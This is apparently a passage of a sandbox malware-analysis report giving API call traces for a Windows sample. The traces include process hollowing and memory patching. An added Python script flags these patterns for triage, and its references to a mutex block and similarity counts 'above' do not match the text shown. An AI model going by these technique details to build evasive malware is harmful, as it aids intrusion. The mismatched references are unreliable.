  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
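Two of the API lists above are combinations an analyst normally recognises by eye: the OpenMutexA / SetLastError(000000B7) / CreateMutexA sequence in subcall function 001C44A4 (0xB7 is ERROR_ALREADY_EXISTS, so the caller is told "already running" whether the mutex was opened or created) and the memset / ResumeThread / WaitForSingleObject / SuspendThread sequence whose subcall 001DBD3F unmaps a section with NtUnmapViewOfSection, which is the shape of process hollowing. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses lines in this report's "APIs" format into per-function call records and flags those two combinations. The input is a constructed excerpt of lines copied from above; the pattern names and the heuristics behind them are the example's own assumptions, and a match is a triage hint, not a verdict.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

ERROR_ALREADY_EXISTS = 0xB7  # Win32 error 183, the value passed to SetLastError above

# Constructed sample: lines copied from two "APIs" lists in this report section.
SAMPLE = """\
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
Memory Dump Source
APIs
  • memset.NTDLL ref: 001DC240
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
Memory Dump Source
"""

# One bullet of an "APIs" list: optional subcall prefix, API.MODULE, optional
# argument list, then the call-site address after "ref:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list               # ints for 8-digit hex literals, raw strings otherwise ('?' = unknown)
    ref: int                 # address of the call site
    parent: Optional[str]    # set when the call sits inside a "Part of subcall function" line


def parse_arg(tok: str):
    """Turn a report argument token into an int when it is a hex literal."""
    tok = tok.strip()
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text: str) -> List[List[Call]]:
    """Split report text into per-function blocks; each 'APIs' header opens a new block."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if not m or current is None:
            continue  # headers such as "Memory Dump Source" carry no calls
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        current.append(Call(m.group("api"), m.group("module"), args,
                            int(m.group("ref"), 16), m.group("parent")))
    return blocks


def flag_patterns(block: List[Call]) -> set:
    """Heuristic API-combination checks over one function block, subcalls included."""
    apis = {c.api for c in block}
    flags = set()
    # OpenMutex + SetLastError(ERROR_ALREADY_EXISTS) + CreateMutex: a single-instance
    # check that reports "already exists" on the open path as well as the create path.
    # (0x00100001 in the sample is SYNCHRONIZE | MUTEX_MODIFY_STATE.)
    if ({"OpenMutexA", "OpenMutexW"} & apis) and ({"CreateMutexA", "CreateMutexW"} & apis) \
            and any(c.api == "SetLastError" and c.args[:1] == [ERROR_ALREADY_EXISTS] for c in block):
        flags.add("single_instance_mutex")
    # Unmapping a section plus suspending/resuming a thread is the shape of process
    # hollowing (RunPE); treat it as a hint to pull the target process handle next.
    if "NtUnmapViewOfSection" in apis and {"ResumeThread", "SuspendThread"} <= apis:
        flags.add("hollowing_shape")
    return flags


def triage(text: str):
    """Return (label, flags) per block; label is the lowest top-level call-site address."""
    out = []
    for block in parse_api_lines(text):
        if not block:
            continue
        top = [c for c in block if c.parent is None] or block
        out.append((f"{min(c.ref for c in top):08X}", flag_patterns(block)))
    return out


if __name__ == "__main__":
    for label, flags in triage(SAMPLE):
        print(label, sorted(flags) or "-")
```

Run it against a saved copy of this section and every block whose flags are non-empty is a function worth opening in the disassembler first; the remaining blocks (heap bookkeeping, string formatting) are where most of the 117- and 377-match similarity counts above come from and can wait.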
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
